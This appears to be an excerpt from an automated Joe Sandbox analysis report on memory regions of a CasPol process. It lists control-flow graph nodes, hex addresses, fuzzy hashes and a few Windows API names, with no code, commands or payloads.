                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2752 575c858-575c873 2753 575caa5-575cacd 2752->2753 2754 575c879-575c880 2752->2754 2768 575cad4-575cbec 2753->2768 2755 575c882-575c88b 2754->2755 2756 575c88c-575c8ab 2754->2756 2757 575c8b1-575c8d2 2756->2757 2758 575ca98-575caa4 2756->2758 2760 575c8d4-575c8d8 2757->2760 2761 575c8da-575c908 2757->2761 2760->2761 2762 575c90a 2760->2762 2765 575c90d-575c993 call 575b270 2761->2765 2762->2765 2824 575c995 call 575cc32 2765->2824 2825 575c995 call 575c849 2765->2825 2826 575c995 call 575c858 2765->2826 2827 575c995 call 5753658 2765->2827 2791 575cbf5-575cc40 2768->2791 2792 575cbee-575cbf4 2768->2792 2780 575c99b-575c9a9 call 575ba08 2785 575ca08-575ca0c 2780->2785 2786 575c9ab-575c9ad 2780->2786 2788 575ca4f-575ca56 2785->2788 2789 575ca0e-575ca1b 2785->2789 2790 575c9f1-575ca00 2786->2790 2793 575ca58-575ca5f 2788->2793 2794 575ca6a-575ca6e 2788->2794 2796 575ca1d-575ca22 2789->2796 2797 575ca2f-575ca41 2789->2797 2790->2785 2795 575ca02 2790->2795 2815 575cc42 2791->2815 2816 575cc4a-575cc4e 2791->2816 2792->2791 2793->2794 2798 575ca61 2793->2798 2801 575ca90-575ca95 2794->2801 2802 575ca70-575ca77 2794->2802 2799 575ca04-575ca06 2795->2799 2800 575c9af-575c9bb 2795->2800 2796->2797 2803 575ca24-575ca2d 2796->2803 2797->2801 2810 575ca43-575ca4d 2797->2810 2798->2794 2799->2785 2799->2800 2800->2768 2807 575c9c1-575c9f0 2800->2807 2801->2758 2802->2801 2806 575ca79-575ca8f 2802->2806 2803->2801 2807->2790 2810->2801 2815->2816 2818 575cc50-575cc5c 2816->2818 2819 575cc6a 2816->2819 2821 575cc64 2818->2821 2822 575cc5e-575cc61 2818->2822 2823 575cc6b 2819->2823 2821->2819 2822->2821 2823->2823 2824->2780 2825->2780 2826->2780 2827->2780
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 473960e53daa290b30724ff41ef8f6894cabd918655bc7c404341f004a4426c3
                                                                      • Instruction ID: 28da5c2af368cc2b7d780dca0c6c4bace48987008f941d9526b4fde634df9e2b
                                                                      • Opcode Fuzzy Hash: 473960e53daa290b30724ff41ef8f6894cabd918655bc7c404341f004a4426c3
                                                                      • Instruction Fuzzy Hash: 55D15D71E00209DFCB15DFA9C484AAEBBF6FF48320F14855AE815AB351DB74AD46CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24ff417ace7b469ab759cb69492bd32f4af9f45ef74516b06e8846160853ebc1
                                                                      • Instruction ID: 542ae3daabcc2b65468691f57a33f0bddb1a89643e2a274475aed45d4211abbb
                                                                      • Opcode Fuzzy Hash: 24ff417ace7b469ab759cb69492bd32f4af9f45ef74516b06e8846160853ebc1
                                                                      • Instruction Fuzzy Hash: 38A1A330F002148FEF59ABB5986567E7BA7BFD4700F18842EE506E7388DE399C0597A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c442e6e8283f8067fc595e3205434e37c13e71fca660b3f5409a1c8bc2c95809
                                                                      • Instruction ID: b1ae1d9e4ea8d4693ffae84bf94132fac96db9500a3d73730564d7c029a94b97
                                                                      • Opcode Fuzzy Hash: c442e6e8283f8067fc595e3205434e37c13e71fca660b3f5409a1c8bc2c95809
                                                                      • Instruction Fuzzy Hash: 22B14170E14209DFDB10CFA9C885BEDBBF2BF88325F148239D815A7254EB749845DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0ab5d130ea460fe68c9e62292fd86346106b32e83497d1d513f5c5679f442a4
                                                                      • Instruction ID: 9f394f932d6625a8e0df7a4be748b1990b2b845b07a888cd4bbf08211372300e
                                                                      • Opcode Fuzzy Hash: d0ab5d130ea460fe68c9e62292fd86346106b32e83497d1d513f5c5679f442a4
                                                                      • Instruction Fuzzy Hash: A8B18D70E00219DFDB10CFA9C8857ADBBF2BF88325F148239D815A7294EBB49841DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d620003827964dd73ff556184e1b4795ca08459b25b884b172c7cb3947982f1b
                                                                      • Instruction ID: 751e5efba2dcd73baee412263def269cc7e4adbc2785a89402297a21ce38c971
                                                                      • Opcode Fuzzy Hash: d620003827964dd73ff556184e1b4795ca08459b25b884b172c7cb3947982f1b
                                                                      • Instruction Fuzzy Hash: CA915E71E00219DFDF10CFA9C9847EDBBF2BF88324F148129E915A7294DBB49845DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 294 67999e8-67999ea 295 67999ec-67999f0 294->295 296 67999f2 294->296 295->296 297 67999fa-67999fd 296->297 298 67999f4-67999f6 296->298 300 67999fe-6799a03 297->300 299 67999f8-67999f9 298->299 298->300 299->297 301 6799a2d 300->301 302 6799a05-6799a2c call 6797f24 300->302 304 6799a30-6799a4c call 6797f30 301->304 309 6799a4e-6799a51 304->309 310 6799a52-6799a90 304->310 310->304 315 6799a92 310->315 316 6799a9a-6799ab1 315->316 317 6799a94-6799a99 315->317 320 6799ab3-6799ab6 316->320 321 6799ab7-6799acd 316->321 317->316 323 6799acf-6799b44 GlobalMemoryStatusEx 321->323 324 6799b47-6799b4c 321->324 328 6799b4d-6799b75 323->328 329 6799b46 323->329 324->328 329->324
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74a6d58aec097a97d932785feeb951841249d36cb732a711f0ad088438c04b4e
                                                                      • Instruction ID: 1841a52220305a2370d9322ab85228863287cb61e226dc90a13860061d140d51
                                                                      • Opcode Fuzzy Hash: 74a6d58aec097a97d932785feeb951841249d36cb732a711f0ad088438c04b4e
                                                                      • Instruction Fuzzy Hash: AB413572D143959FDB00CBA9D8002AEBBF5EF86210F1886ABD605E7241DB789844CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 331 5754834-5757527 333 5757529-575754e 331->333 334 575757b-57575c7 LoadLibraryA 331->334 333->334 339 5757550-5757552 333->339 337 57575d0-5757601 334->337 338 57575c9-57575cf 334->338 346 5757611 337->346 347 5757603-5757607 337->347 338->337 341 5757575-5757578 339->341 342 5757554-575755e 339->342 341->334 343 5757560 342->343 344 5757562-5757571 342->344 343->344 344->344 348 5757573 344->348 350 5757612 346->350 347->346 349 5757609 347->349 348->341 349->346 350->350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 5f46f2070d5606d60f146793fcbdbd9f3303d3c4d28aa100d87a5eb22a3d17d1
                                                                      • Instruction ID: 6b440d7d15bedfa074edaa5037ea1c2a49e8eae4fd18f307e2abf658df619662
                                                                      • Opcode Fuzzy Hash: 5f46f2070d5606d60f146793fcbdbd9f3303d3c4d28aa100d87a5eb22a3d17d1
                                                                      • Instruction Fuzzy Hash: 3D4146B0D00658DFDB14CFAAC88479EBBF1FB48364F10812AE819AB340D7B49845DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 351 57574c4-5757527 353 5757529-575754e 351->353 354 575757b-57575c7 LoadLibraryA 351->354 353->354 359 5757550-5757552 353->359 357 57575d0-5757601 354->357 358 57575c9-57575cf 354->358 366 5757611 357->366 367 5757603-5757607 357->367 358->357 361 5757575-5757578 359->361 362 5757554-575755e 359->362 361->354 363 5757560 362->363 364 5757562-5757571 362->364 363->364 364->364 368 5757573 364->368 370 5757612 366->370 367->366 369 5757609 367->369 368->361 369->366 370->370
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.803142756.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_5750000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 022c7c01d58ba7eb96ca10d754c23920b957c6f974c25200f05ab41ca130f5f1
                                                                      • Instruction ID: 95e4e924d6ed64ca475cd93d03bfcac6f87eddc117fcdff56f642086414210d5
                                                                      • Opcode Fuzzy Hash: 022c7c01d58ba7eb96ca10d754c23920b957c6f974c25200f05ab41ca130f5f1
                                                                      • Instruction Fuzzy Hash: CD4147B0D00258DFDB14CFAAC88479EBBF1FB48764F10852AE815AB340D7B49845DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 992 6799ad0-6799b0e 993 6799b16-6799b44 GlobalMemoryStatusEx 992->993 994 6799b4d-6799b75 993->994 995 6799b46-6799b4c 993->995 995->994
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 06799B37
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.804325442.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_6790000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 755ce5bd87a9513bab301f19849958780ea5252d5bc509e23434202636899a50
                                                                      • Instruction ID: aaa3e12aa0e5e388b64bee8c465f02ffbda328345da20891bff633f9091ff9a9
                                                                      • Opcode Fuzzy Hash: 755ce5bd87a9513bab301f19849958780ea5252d5bc509e23434202636899a50
                                                                      • Instruction Fuzzy Hash: 2C1112B1C00629DBCB10CF9AD844BDEFBF8AF48324F14816AD418B7640D378A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%